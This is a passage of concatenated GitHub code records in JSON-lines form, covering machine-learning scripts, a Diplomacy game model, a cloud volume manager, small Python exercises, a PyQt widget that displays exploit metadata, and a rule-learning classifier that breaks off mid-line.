method = \"scratch\" # or \"sklearn\" (only sklearn for NB)\n l_rate = 0.01 # learning rate\n max_it = 1000 # maximum iterations\n set_ = \"test\" # or \"train\"\n \n if modelLabel == \"logistic\":\n name_to_print = \"Logistic Regression\"\n elif modelLabel == \"NB\":\n name_to_print = \"Naive Bayes\"\n else:\n raise ValueError(\"invalid modelLabel\")\n \n main(X_train, X_test, y_train, y_test, modelLabel, method, l_rate, max_it, name_to_print, set_)\n \n \n \n\n\n\n","repo_name":"arshmodak/Machine-Learning-and-Data-Science","sub_path":"Supervised Learning/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":11193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"13325999626","text":"#!/usr/bin/python\n\nimport pdata\npdb=pdata.pdata()\n\ndef error(str):\n print (\"ERROR: \"+str)\n return\n \nclass Country(object):\n def __init__(self, name, player):\n self.name=name\n self.player=player\n self.provinces=[]\n self.province_names=[]\n self.unit_locations=[]\n self.surrendered=False\n self.dislodged_units=[]\n def surrender(self):\n if (self.surrendered==False):\n self.surrendered=True\n print(self.name+\" (Player \"+str(player)+\") has surrendered.\")\n else:\n error(self.name+\" (Player \"+str(player)+\") has already surrendered.\")\n return\n def start_provinces(self):\n if (self.name==\"Austria\"):\n self.provinces=[\n Province(\"Bohemia\",False,self),\n Province(\"Budapest\",True,self,\"Army\"),\n Province(\"Galicia\",False,self),\n Province(\"Trieste\",True,self,\"Fleet\"),\n Province(\"Tyrolia\",False,self),\n Province(\"Vienna\",True,self,\"Army\")]\n self.unit_locations.append(\"Budapest\")\n self.unit_locations.append(\"Trieste\")\n self.unit_locations.append(\"Vienna\")\n elif (self.name==\"England\"):\n self.provinces=[\n Province(\"Clyde\",False,self),\n Province(\"Edinburgh\",True,self,\"Fleet\"),\n Province(\"Liverpool\",True,self,\"Army\"),\n Province(\"London\",True,self,\"Fleet\"),\n Province(\"Wales\",False,self),\n Province(\"Yorkshire\",False,self)]\n self.unit_locations.append(\"Edinburgh\")\n self.unit_locations.append(\"Liverpool\")\n self.unit_locations.append(\"London\")\n elif (self.name==\"France\"):\n self.provinces=[\n Province(\"Brest\",True,self,\"Fleet\"),\n Province(\"Burgundy\",False,self),\n Province(\"Gascony\",False,self),\n Province(\"Marseilles\",True,self,\"Army\"),\n Province(\"Paris\",True,self,\"Army\"),\n Province(\"Picardy\",False,self)]\n self.unit_locations.append(\"Brest\")\n self.unit_locations.append(\"Marseilles\")\n self.unit_locations.append(\"Paris\")\n elif (self.name==\"Germany\"):\n self.provinces=[\n Province(\"Berlin\",True,self,\"Army\"),\n Province(\"Kiel\",True,self,\"Fleet\"),\n Province(\"Munich\",True,self,\"Army\"),\n Province(\"Prussia\",False,self),\n Province(\"Ruhr\",False,self),\n Province(\"Silesia\",False,self)]\n self.unit_locations.append(\"Berlin\")\n self.unit_locations.append(\"Kiel\")\n self.unit_locations.append(\"Munich\")\n elif (self.name==\"Italy\"):\n self.provinces=[\n Province(\"Apulia\",False,self),\n Province(\"Naples\",True,self,\"Fleet\"),\n Province(\"Piedmont\",False,self),\n Province(\"Rome\",True,self,\"Army\"),\n Province(\"Tuscany\",False,self),\n Province(\"Venice\",True,self,\"Army\")]\n self.unit_locations.append(\"Naples\")\n self.unit_locations.append(\"Rome\")\n self.unit_locations.append(\"Venice\")\n elif (self.name==\"Russia\"):\n self.provinces=[\n 
Province(\"Finland\",False,self),\n Province(\"Livonia\",False,self),\n Province(\"Moscow\",True,self,\"Army\"),\n Province(\"Saint Petersburg\",True,self,\"Fleet\",\"South Coast\",[\"North Coast\",\"South Coast\"]),\n Province(\"Sevastopol\",True,self,\"Fleet\"),\n Province(\"Ukraine\",False,self),\n Province(\"Warsaw\",True,self,\"Army\")]\n self.unit_locations.append(\"Moscow\")\n self.unit_locations.append(\"Saint Petersburg\")\n self.unit_locations.append(\"Sevastopol\")\n self.unit_locations.append(\"Warsaw\")\n elif (self.name==\"Turkey\"):\n self.provinces=[\n Province(\"Ankara\",True,self,\"Fleet\"),\n Province(\"Armenia\",False,self),\n Province(\"Constantinople\",True,self,\"Army\"),\n Province(\"Smyrna\",True,self,\"Army\"),\n Province(\"Syria\",False,self)]\n self.unit_locations.append(\"Ankara\")\n self.unit_locations.append(\"Constantinople\")\n self.unit_locations.append(\"Smyrna\")\n elif (self.name==\"Neutral\"):\n self.provinces=[\n Province(\"Norway\",True),\n Province(\"Sweden\",True),\n Province(\"Denmark\",True),\n Province(\"Holland\",True),\n Province(\"Belgium\",True),\n Province(\"Spain\",True,None,None,None,[\"North Coast\",\"South Coast\"]),\n Province(\"Portugal\",True),\n Province(\"North Africa\",False),\n Province(\"Tunisia\",True),\n Province(\"Rumania\",True),\n Province(\"Serbia\",True),\n Province(\"Albania\",False),\n Province(\"Greece\",True),\n Province(\"Bulgaria\",True,None,None,None,[\"East Coast\",\"South Coast\"]),\n Province(\"Barents Sea\",False),\n Province(\"Norwegian Sea\",False),\n Province(\"North Atlantic\",False),\n Province(\"North Sea\",False),\n Province(\"Skagerrak\",False),\n Province(\"Heligoland Bight\",False),\n Province(\"Baltic Sea\",False),\n Province(\"Gulf of Bothnia\",False),\n Province(\"English Channel\",False),\n Province(\"Irish Sea\",False),\n Province(\"Mid Atlantic\",False),\n Province(\"Gulf of Lyons\",False),\n Province(\"Western Mediterranean Sea\",False),\n Province(\"Tyrhenian Sea\",False),\n Province(\"Adriatic Sea\",False),\n Province(\"Ionian Sea\",False),\n Province(\"Aegean Sea\",False),\n Province(\"Black Sea\",False),\n Province(\"East Mediterranean Sea\",False)]\n else:\n error(\"Unknown country name. 
Cannot construct provinces.\")\n return\n for p in self.provinces:\n self.province_names.append(p.name)\n \nclass Province(object):\n def __init__(self, name, sc, country=None, u=None, ucoast=None,coasts=None):\n self.name=name\n self.country=country\n self.is_sc=sc #is supply center?\n if (u is not None):\n self.unit=Unit(u,country,self,ucoast)\n else:\n self.Unit=None\n self.coasts=coasts\n borders=pdb.get_borders(name)\n if (coasts is None):\n borders.sort()\n else:\n for b in borders.values():\n b.sort()\n self.borders=borders\n if coasts is None:\n self.expects={\n \"Move\":[],\n \"Support\":[],\n \"Convoy\":[],\n \"Hold\":[]\n }\n else:\n self.expects={\n \"Move\":[],\n (\"Move \"+coasts[0]):[],\n (\"Move \"+coasts[1]):[],\n \"Support\":[],\n \"Convoy\":[],\n \"Hold\":[]\n }\n def full_name(self,coast):\n if coast is None:\n return self.name\n else:\n return self.name+\" \"+coast\nclass Unit(object):\n def __init__(self, type, country, loc, coast=None):\n self.type=type\n self.country=country\n self.loc=loc\n self.coast=coast\n #temporary stats, used by adjudicator\n self.support=0\n self.convoyed=True\n self.intended_coast=None\n self.intended_convoy=None\n self.intended_support=None\n self.dislodged=None\n","repo_name":"hcourt/diplomacy","sub_path":"diplomacy/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31626610483","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport time\nimport logging\nfrom collections import deque\n\nprint(time.time())\nlogging.error(\"can't dump counter to file %s: %s\", 'aaa', 'bbb')\na = deque(maxlen=10)\na.append(1)\na.append(2)\na.append(3)\n\nprint(a.pop())\n","repo_name":"Sidabw/forest-pine-py","sub_path":"py-mac/6-py-zenki/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4427444658","text":"# -*- Mode: Python; python-indent-offset: 4 -*-\n#\n# Time-stamp: <2018-05-06 14:56:00 alex>\n#\n\n\"\"\"Volumes manipulation.\"\"\"\n\n\nimport logging\nimport json\nimport datetime\nimport re\nimport slumber\n\n\nclass CVolumes():\n \"\"\"Volumes.\"\"\"\n\n def __init__(self, sw):\n \"\"\"Constructor.\"\"\"\n logging.debug(\"init volumes\")\n self.a_volumes = []\n self.sw_api = sw.get_compute_api()\n\n self.last_refresh = 0\n\n # ----------------------------------------\n def refresh(self):\n \"\"\"Reload from server the list of volumes.\"\"\"\n if self.last_refresh != 0:\n delta = datetime.datetime.now(datetime.timezone.utc) - self.last_refresh\n if delta.seconds < 60:\n logging.warning(\"refresh time too low\")\n return False\n\n try:\n resp = self.sw_api.query().volumes.get()\n except slumber.exceptions.SlumberBaseException as error:\n a_error = json.loads(error.content.decode())\n logging.error(\"%s: %s\", a_error['type'], a_error['message'])\n return False\n\n self.a_volumes = resp['volumes']\n self.last_refresh = datetime.datetime.now(datetime.timezone.utc)\n\n # ----------------------------------------\n def __str__(self):\n \"\"\"Return a string with volumes information.\"\"\"\n self.refresh()\n\n if not self.a_volumes:\n return \"volumes ---------------\\n\" + \" no volume found\"\n\n resp = \"\"\n\n for volume in self.a_volumes:\n changed, subs = re.subn(r'\\+00:00',\n \"+0000\",\n volume['modification_date'])\n if subs > 0:\n s_last_used = changed\n else:\n 
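# No +00:00 suffix was matched above, so keep the timestamp exactly as stored.\n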
                s_last_used = volume['modification_date']\n\n            date_mod = datetime.datetime.strptime(s_last_used,\n                                                  \"%Y-%m-%dT%H:%M:%S.%f%z\")\n            delta = str(datetime.datetime.now(datetime.timezone.utc) - date_mod)\n\n            resp = resp + \"\\n{} {:.1f}G\".format(volume['volume_type'],\n                                                volume['size'] / 1e9)\n\n            if volume['server'] is not None:\n                resp = resp + \"\\n server={}, last used={}\".format(volume['server']['name'],\n                                                                  delta)\n            else:\n                resp = resp + \"\\n not attached, last used={:s}\".format(delta)\n\n            resp = resp + \"\\n id={}\".format(volume['id'])\n\n        return \"volumes ---------------\\n\" + resp\n\n    # ----------------------------------------\n    def delete(self, volume_id=\"\"):\n        \"\"\"Delete the specified volume.\"\"\"\n        if volume_id == \"\":\n            logging.error(\"should specify a volume to delete\")\n            return False\n\n        try:\n            return self.sw_api.query().volumes(volume_id).delete()\n        except slumber.exceptions.SlumberBaseException as error:\n            a_error = json.loads(error.content.decode())\n            logging.error(\"%s: %s\", a_error['type'], a_error['message'])\n            return False\n","repo_name":"achauvinhameau/pyScaleway","sub_path":"CVolumes/CVolumes.py","file_name":"CVolumes.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5707330599","text":"import random\n\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n# Compare the player's choice with the computer's to decide who won\ngame_image = [rock, paper, scissors]\nyou = int(input(\"Choose what to play: 0: rock, 1: paper, 2: scissors.\\n\"))\n# Validate first: only 0..2 are valid indexes into game_image and match randint's range\nif you >= 3 or you < 0:\n    print(\"You entered an invalid number\")\nelse:\n    print(\"Your choice: \")\n    print(game_image[you])\n    computer = random.randint(0,2)\n    print(\"The computer's choice:\")\n    print(game_image[computer])\n\n    if you == computer:\n        print(\"Draw!\")\n    elif (you - computer) % 3 == 1:\n        # rock beats scissors, paper beats rock, scissors beat paper\n        print(\"you Win!\")\n    else:\n        print(\"you Lose!\")\n","repo_name":"dja1369/Udemy_python","sub_path":"Udemy_python/Basic_python/Rock_Scissors_Paper.py","file_name":"Rock_Scissors_Paper.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1837846223","text":"import cv2\nimport numpy as np\nfrom poolfit.tensorflow_impl.rotation_conversion import matrix_to_axis_angle, axis_angle_to_matrix\nimport tensorflow as tf\n\ndef normalize(v):\n    norm = tf.norm(v)\n    if norm==0: return v\n    return v/norm\n\nclass Camera(tf.keras.Model):\n    def __init__(self, initf, imgH, imgW) -> None:\n        super().__init__()\n\n        # intrinsics related\n        self.imgW = imgW\n        self.imgH = imgH\n        self.initf = initf\n        self.f_corrfac = tf.Variable( 1.0, name=\"f_corrfac\", dtype=tf.float32, trainable=True )\n\n        # extrinsics related\n        self._pos = tf.Variable( [1.,1.,1.], name=\"_pos\" , dtype=tf.float32, trainable=False) # pos in world frame\n        self.pos_in_cam_frame = tf.Variable( [1.,1.,1.], name=\"pos_in_cam_frame\", dtype=tf.float32, trainable=True)\n        self.axis_angle = tf.Variable( [0.,0.,0.], name=\"axis_angle\" , dtype=tf.float32, trainable=True)\n\n        self.lookat = tf.Variable([0.,0.,0.], dtype=tf.float32, trainable=False)\n        self.roll = 0.\n\n        self.intrinsicM = tf.eye(3, dtype=tf.float32)\n        self.extrinsicM = tf.eye(4, 
dtype=tf.float32)[0:3]\n self.perspectiveM = tf.eye(4, dtype=tf.float32)[0:3]\n\n self.fov_deg_h = -1\n self.fov_deg_v = -1\n\n self._update_fov()\n self._update_intrinsicM()\n self._update_extrinsicM()\n\n @property\n def f(self):\n return 1./self.f_corrfac* self.initf\n \n @f.setter\n def f(self, val):\n self.initf = val\n self.f_corrfac.assign(1.0)\n self._update_fov()\n self._update_intrinsicM()\n \n @property\n def pos(self):\n return tf.linalg.matvec( tf.transpose(-self.extrinsicM[:3,:3]) , self.pos_in_cam_frame)\n \n @pos.setter\n def pos(self, xyz):\n self._pos.assign(xyz)\n self.set_lookat(self.lookat)\n self._update_extrinsicM() \n\n def set_f(self, val): \n self.f = val\n \n def set_img_size(self, imgH, imgW):\n self.imgH = imgH\n self.imgW = imgW\n self._update_intrinsicM()\n\n def set_pos(self, xyz):\n self.pos = xyz\n\n def set_lookat(self, lookat, roll=0.):\n if roll!=0.:\n raise NotImplementedError(\"roll != 0 not yet work\")\n \n self.lookat.assign(lookat)\n self.roll = roll\n \n camZ = normalize(-self._pos + self.lookat)\n\n if camZ[0]==camZ[1]==0:\n camX = tf.Variable([1., 0., 0.], dtype=tf.float32, trainable=False)\n elif abs(camZ[1])>abs(camZ[0]):\n camX = tf.Variable([1., -camZ[0]/camZ[1], 0.], dtype=tf.float32, trainable=False)\n else:\n camX = tf.Variable([-camZ[1]/camZ[0], 1., 0.], dtype=tf.float32, trainable=False)\n camX = normalize(camX)\n\n camY = tf.linalg.cross(camZ, camX)\n\n if camY[2]<0:\n camY = -camY\n camX = -camX\n\n rotM = tf.stack([camX, camY, camZ], axis=0)\n\n #with tf.no_grad():\n self.pos_in_cam_frame.assign( tf.linalg.matvec(-rotM, self._pos))\n self.axis_angle.assign(matrix_to_axis_angle(rotM))\n self._update_extrinsicM() \n\n def set_f_fixed(self, flag):\n self.f_corrfac.requires_grad = not flag\n\n def _update_fov(self):\n self.fov_deg_w = np.rad2deg( np.arctan(self.imgW/2/self.f)*2 )\n self.fov_deg_h = np.rad2deg( np.arctan(self.imgH/2/self.f)*2 )\n print(f\"FOV (deg) Horizontal:{self.fov_deg_h} \")\n\n def _update_intrinsicM(self):\n \"\"\"\n PixXYW = IntrinsicM @ CamFrameXYZ\n need to norm the w component of PixXYW to get pix (x,y) coord\n \"\"\"\n A = tf.constant([\n [ -1, 0, self.imgW/2],\n [ 0, -1, self.imgH/2],\n [ 0, 0, 1],\n ], dtype=tf.float32)\n\n fval = 1./self.f_corrfac * self.initf\n B = tf.stack([fval,fval,1])\n\n self.intrinsicM = A*B\n\n self.perspectiveM = self.intrinsicM @ self.extrinsicM\n \n def _update_extrinsicM(self):\n \"\"\"\n CamFrameXYZ = extrinsicM @ WorldFrameXYZ1\n \"\"\"\n rotMat = axis_angle_to_matrix( self.axis_angle)\n xyzCol = tf.expand_dims(self.pos_in_cam_frame,1)\n extrinsicM = tf.concat( [rotMat, xyzCol], axis=1) # 3x3 ,3x1 -> 3x4\n\n self.extrinsicM = extrinsicM\n self.perspectiveM = self.intrinsicM @ self.extrinsicM\n\n def getPixCoords(self, worldCoords, tune_cam_params=False, getScales=False, doUpdate=True):\n \"\"\"\n worldCoords : numpy array (n,3)\n \"\"\"\n if tune_cam_params:\n if doUpdate:\n # self._update_intrinsicM()\n A = tf.constant([\n [ -1, 0, self.imgW/2],\n [ 0, -1, self.imgH/2],\n [ 0, 0, 1],\n ], dtype=tf.float32)\n\n fval = 1./self.f_corrfac * self.initf\n B = tf.stack([fval,fval,1])\n\n intrinsicM = A*B\n\n # self._update_extrinsicM()\n rotMat = axis_angle_to_matrix( self.axis_angle)\n xyzCol = tf.expand_dims(self.pos_in_cam_frame,1)\n extrinsicM = tf.concat( [rotMat, xyzCol], axis=1) # 3x3 ,3x1 -> 3x4\n\n \n self.perspectiveM = intrinsicM @ extrinsicM\n\n perspectiveM = self.perspectiveM\n else:\n perspectiveM = self.perspectiveM\n\n if type(worldCoords) in [np.ndarray]: 
worldCoords = tf.Variable(worldCoords, dtype=tf.float32)\n\n xyzws = tf.concat( [worldCoords, tf.ones([1,worldCoords.shape[1], 1])], axis=2 )\n xyws = perspectiveM @ tf.transpose(xyzws, perm=[0,2,1])\n xyws = tf.transpose(xyws, perm=[0,2,1])\n ws = xyws[:,:,2]\n mask = ws>0 # if false, point is behind the cam\n xys = xyws[:,:,0:2] / ws[:,:,None] # normalize w to 1\n\n if getScales:\n cam_frame_xyzs = self.extrinsicM @ tf.transpose(xyzws)\n scale = 1./self.f_corrfac* self.initf / cam_frame_xyzs[2]\n return xys, mask, scale\n else:\n return xys, mask\n \n def call(self, worldCoords):\n xys, mask = self.getPixCoords(worldCoords, tune_cam_params=True, getScales=False, doUpdate=True)\n return xys\n \n def getWorldCoords(self, imgCoords):\n \"\"\"\n inf possible points along a ray in world can give same XY in img, we give the pt that is on the z=0 plane at the world\n \"\"\"\n #with tf.no_grad():\n if type(imgCoords) in [np.ndarray]: imgCoords = tf.Variable(imgCoords, dtype=tf.float32)\n imgCoords = tf.cat( [imgCoords, tf.ones([len(imgCoords), 1])], axis=1 )\n invM = tf.linalg.inv(self.perspectiveM[:,[0,1,3]])\n world_xyws = invM @ tf.transpose(imgCoords)\n world_xyws = tf.transpose(world_xyws)\n\n world_xyzs = tf.zeros_like(world_xyws)\n world_xyzs[:,0:2] = world_xyws[:,0:2] / world_xyws[:,2]\n \n return world_xyzs\n\ndef drawPolygon(pts, canvas = None, color = (255,0,0), imgsize=(1000,1000)):\n if canvas is None:\n canvas = np.zeros((imgsize[0],imgsize[1],3), dtype=np.uint8)\n if type(pts)==tf.Variable:\n pts = pts.numpy()\n\n pts = pts.astype(int)\n for i in range(0,len(pts)-1):\n _ = cv2.line(canvas, tuple(pts[i]), tuple(pts[i+1]), color, 2)\n _ = cv2.line(canvas, tuple(pts[-1]), tuple(pts[0]), color, 2)\n return canvas\n\nif __name__==\"__main__\":\n # unit m\n # rectangle to fit\n recth = 1.0\n rectw = tf.Variable( 1.0, dtype=tf.float32, trainable=True)\n balld = 0.0615\n\n def gen_rect(recth, rectw):\n pts = tf.Variable([\n [-0.5*rectw, 0.5*recth, 0],\n [ 0.5*rectw, 0.5*recth, 0],\n [ 0.5*rectw, -0.5*recth, 0],\n [-0.5*rectw, -0.5*recth, 0],\n ], dtype=tf.float32)\n\n # pts[:,0]*=rectw\n # pts[:,1]*=recth\n\n return pts\n\n pts = gen_rect(recth, rectw)\n\n camera = Camera(800., 1000, 1000)\n camera.set_f(1000.)\n camera.set_pos([-5,1,5])\n camera.set_lookat([0,0,0]) \n \n xys, mask = camera.getPixCoords(pts, tune_cam_params=True)\n print(xys)\n print(mask)\n\n ref_xys = tf.Variable([\n [317.91403682 ,535.04245995],\n [548.6423495 ,415.74897926],\n [662.0134948 ,468.82048839],\n [430.72150222 ,619.99387802],\n ], dtype = tf.float32)\n\n optimizer = tf.keras.optimizers.Adadelta(learning_rate=0.001)\n\n for i in range(3):\n\n with tf.GradientTape() as tape:\n xys, mask = camera.getPixCoords(pts, tune_cam_params=True)\n loss = tf.nn.l2_loss(ref_xys - xys)\n print(i, loss)\n var_list = camera.trainable_variables + [rectw]\n grads = tape.gradient(loss, var_list)\n optimizer.apply_gradients(zip(grads, var_list))\n\n\n\n # opt = optim.Adam( list(camera.parameters()) + [rectw], lr=0.01)\n # lossFunc = nn.L1Loss()\n # for iter in range(10000):\n \n\n # pts = gen_rect(recth, rectw)\n # xys, mask = camera.getPixCoords(pts, tune_cam_params=True)\n # loss = lossFunc(xys, ref_xys)\n # print(f\"iter: {iter} loss: {loss}\")\n # loss.backward()\n # opt.step()\n # opt.zero_grad()\n\n # if (iter%100)==0:\n # canvas = np.zeros((1000,1000,3), dtype=np.uint8)\n # drawPolygon(ref_xys, canvas, (0,255,0) )\n # drawPolygon( xys, canvas, (0,0,255) )\n # cv2.imwrite(f\"./testoutput/iter{iter:04d}.png\", canvas)\n\n # 
print(f\"rectw: {rectw}\") \n # print(f\"cam f: {camera.initf / camera.f_corrfac}\")\n # print(f\"cam pos: {camera.pos}\")\n\n\n\n\n \n","repo_name":"ylchan87/PoolFit","sub_path":"poolfit/tensorflow_impl/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":9863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71302441037","text":"from PyQt4.uic import loadUi\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QWidget\nfrom rexploit.lib.misc.parse import Parse\nfrom os.path import join, dirname\n\n\nclass Widget(QWidget):\n def __init__(self, name, parent):\n super(Widget, self).__init__(parent)\n ui = join(dirname(__file__.split('rexploit')[0]),\n join(\"rexploit\", \"data\", \"ui\", \"widgets\", \"exploits\", \"{0}.ui\".format(name)))\n\n loadUi(ui, self)\n self.__exploit = None\n self.__vulnerable = False\n self.parent = parent\n self.category = None\n\n # Connect things\n self.checkBoxVulnerable.stateChanged.connect(self.__checkBoxVulnerableStateChanged)\n\n # Labels\n self.labelAuthor.setTextInteractionFlags(Qt.TextSelectableByMouse)\n self.labelDate.setTextInteractionFlags(Qt.TextSelectableByMouse)\n self.labelTarget.setTextInteractionFlags(Qt.TextSelectableByMouse)\n self.labelDescription.setTextInteractionFlags(Qt.TextSelectableByMouse)\n self.labelDescription.setWordWrap(True)\n\n self.labelCWE.setTextFormat(Qt.RichText)\n self.labelCWE.setTextInteractionFlags(Qt.TextBrowserInteraction)\n self.labelCWE.setOpenExternalLinks(True)\n\n self.labelReferences.setTextFormat(Qt.RichText)\n self.labelReferences.setTextInteractionFlags(Qt.TextBrowserInteraction)\n self.labelReferences.setOpenExternalLinks(True)\n\n # Set verticalLayout. It's resize the widget\n self.setLayout(self.verticalLayout)\n\n def __checkBoxVulnerableStateChanged(self):\n \"\"\"This function executes when checkbox changes state\"\"\"\n if self.checkBoxVulnerable.isChecked():\n self.parent.addExploitSuccess(self.__exploit)\n else:\n self.parent.removeExploitSuccess(self.__exploit)\n\n def setCheckBoxVulnerableChecked(self, checked=True):\n \"\"\"\n This function changes checkbox's state\n :param checked: True or False\n :return: None\n \"\"\"\n if checked:\n self.checkBoxVulnerable.setCheckState(Qt.Checked)\n else:\n self.checkBoxVulnerable.setCheckState(Qt.Unchecked)\n\n @staticmethod\n def check(self):\n \"\"\"This function check all thing that you need before exploit will run\"\"\"\n pass\n\n @property\n def exploit(self):\n \"\"\"\n Get the exploit\n :return: the exploit\n \"\"\"\n return self.__exploit\n\n @exploit.setter\n def exploit(self, exploit):\n \"\"\"\n Setter the exploit\n :param exploit: the exploit\n :return: None\n \"\"\"\n self.__exploit = exploit\n self.labelNameExploit.setText(self.__exploit.name)\n self.labelAuthor.setText(self.__exploit.authors)\n self.labelDate.setText(self.__exploit.date)\n self.labelCWE.setText(Parse.CWEToLink(self.__exploit.cwe))\n self.labelTarget.setText(self.__exploit.target)\n self.labelReferences.setText(self.__exploit.references)\n self.labelDescription.setText(self.__exploit.description)\n\n def setExploit(self, exploit):\n \"\"\"\n This function executes when a element's list is clicked.\n :param exploit: the exploit\n :return: None\n \"\"\"\n pass\n\n @property\n def vulnerable(self):\n return self.__vulnerable\n\n @vulnerable.setter\n def vulnerable(self, state):\n self.__vulnerable = state\n self.__exploit.vulnerable = state\n 
self.setCheckBoxVulnerableChecked(state)\n","repo_name":"danilabs/rexploit","sub_path":"rexploit/interfaces/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"29"} +{"seq_id":"44241327657","text":"# checks given number is even or not\ndef check_number_is_even(number):\n if int(number) % 2 == 0:\n return True\n else:\n return False\n\n\n# check given number is prime or not\ndef check_number_is_prime(number):\n count = 0\n for i in range(number):\n if i != 0 and i != 1 and number % i == 0:\n count = count + 1\n\n if count == 0:\n return True\n else:\n return False\n","repo_name":"maturiKarthik/Python-string-manipulation","sub_path":"Arthematic.py","file_name":"Arthematic.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39981731563","text":"import pandas as pd\nimport re\n\n\ndef create_lstm_model_df(all_results_list):\n \"\"\"\n Create lstm meta model dataframe for comparison\n \"\"\"\n\n all_results_dict = dict()\n\n for item in all_results_list:\n for k, v in item.items():\n model_params = k.split(\"_\")\n all_results_dict[\n (\"_\".join(model_params[0:2]))\n ] = {\n model_params[3].split(\":\")[0]: int(\n model_params[3].split(\":\")[1]\n ),\n model_params[4].split(\":\")[0]: int(\n model_params[4].split(\":\")[1]\n ),\n model_params[5].split(\":\")[0]: int(\n model_params[5].split(\":\")[1]\n ),\n model_params[6].split(\":\")[0]: int(\n model_params[6].split(\":\")[1]\n ),\n \"val_loss\": float(\n v[\"model-history\"][\"val_loss\"][0]\n ),\n \"loss\": float(\n v[\"model-history\"][\"loss\"][0]\n ),\n \"MAE-holdout-set\": float(\n v[\"MAE-holdout-set\"].split()[1]\n ),\n \"app-bias-mean-holdout-set\": float(\n v[\"app-bias-mean-holdout-set\"]\n ),\n }\n\n all_results_df = pd.DataFrame(all_results_dict).T\n\n return all_results_df\n\n\ndef get_model(lst, datestamp):\n \"\"\"\n Get model from model list by datestamp\n \"\"\"\n\n for item in lst:\n for k, v in item.items():\n model_params = k.split(\"_\")\n date_stamp = \"_\".join(model_params[0:2])\n if date_stamp == datestamp:\n return v[\"model-object\"]\n","repo_name":"nathancoulson/prediction_app","sub_path":"Modelling_Module/model_comparison_lstm.py","file_name":"model_comparison_lstm.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72317661198","text":"import logging\nfrom abc import abstractmethod, ABC\nfrom typing import List\n\nimport pandas as pd\n\nfrom datasets.dataset_eval import DatasetEval\nfrom rules.rule import Rule\nfrom rules.rule_eval import RuleEval\n\n\nclass FitProgressSubscriber(ABC):\n @abstractmethod\n def update_progress(self, state: int):\n pass\n\n @abstractmethod\n def update_class(self, class_name: str, class_num: int, num_classes: int, total_num_it: int):\n pass\n\n\nclass FitProgressPublisher:\n def __init__(self):\n self.subscribers: List[FitProgressSubscriber] = []\n\n def subscribe(self, s: FitProgressSubscriber):\n self.subscribers.append(s)\n\n def unsubscribe(self, s: FitProgressSubscriber):\n self.subscribers.remove(s)\n\n def notify_progress(self, state: int):\n for s in self.subscribers:\n s.update_progress(state)\n\n def notify_new_class(self, class_name: str, class_num: int, num_classes: int, total_num_it: int):\n for s in self.subscribers:\n s.update_class(class_name, 
class_num, num_classes, total_num_it)\n\n\nclass Prism(FitProgressPublisher):\n def __init__(self):\n super().__init__()\n self._rules: List[Rule] = []\n self.classes = []\n\n @property\n def rules(self):\n return self._rules\n\n @rules.setter\n def rules(self, value: List[Rule]):\n self._rules = value\n self.classes = list(set(r.cl for r in self._rules))\n\n def fit(self, X: pd.DataFrame, y: pd.Series):\n X_y = X.copy()\n X_y['y'] = y\n rules = []\n classes = y.unique() # all unique values of the target variable\n\n for i, cl in enumerate(classes):\n cl_inst = X_y[y == cl] # data points with the current class\n inst = X_y\n self.notify_new_class(cl, i+1, len(classes), len(cl_inst))\n total_cl_inst = len(cl_inst)\n while len(cl_inst) > 0: # while there are instances of the current class that aren't covered by any rule\n rule = Rule(cl) # create new empty rule\n while len(rule.available_attributes(X_y)) > 0 and not rule.is_perfect(X_y): # while there are attributes that are not yet used in the rule and the rule incorrectly classifies any of the training data\n rule.add_operand(inst) # add operand to the rule that has the highest precision (number of class matches)\n logging.info(f\"Final rule: {rule}\\n\")\n cl_inst = rule.not_matched_inst(cl_inst) # remove instances of the current class that are covered by the new rule\n inst = rule.not_matched_inst(inst) # remove instances that are covered by the new rule\n rules.append(rule)\n self.notify_progress(total_cl_inst - len(cl_inst))\n logging.warning(f\"Class: {cl} ({i+1}/{len(classes)}), {len(cl_inst)} remaining\")\n logging.info(f\"Class {cl} completed\\n\")\n self.rules = rules\n\n def classify(self, X: pd.DataFrame):\n classes = {cl: [] for cl in self.classes}\n y = {idx: [] for idx in X.index}\n for r in self.rules:\n match = r.match(X)\n classes[r.cl].extend(match.index)\n for idx, m in match.iterrows():\n y[idx].append(r.cl)\n\n def get_y(row):\n y_list = y[row.name]\n if len(y_list) == 0:\n return None\n return max(set(y[row.name]), key=y[row.name].count)\n return X.apply(get_y, axis=1)\n\n def evaluate_dataset(self, X_test: pd.DataFrame, y_test: pd.Series):\n y_obt = self.classify(X_test)\n diff = y_test.compare(y_obt)\n num_correct = len(X_test) - len(diff)\n return DatasetEval(num_correct / len(X_test),\n num_correct / y_obt.count(),\n y_obt.count() / len(X_test))\n\n def evaluate_rules(self, X_train: pd.DataFrame, y_train: pd.Series) -> List[RuleEval]:\n y_val_counts = y_train.value_counts()\n results: List[RuleEval] = []\n for rule in self.rules:\n X_match = 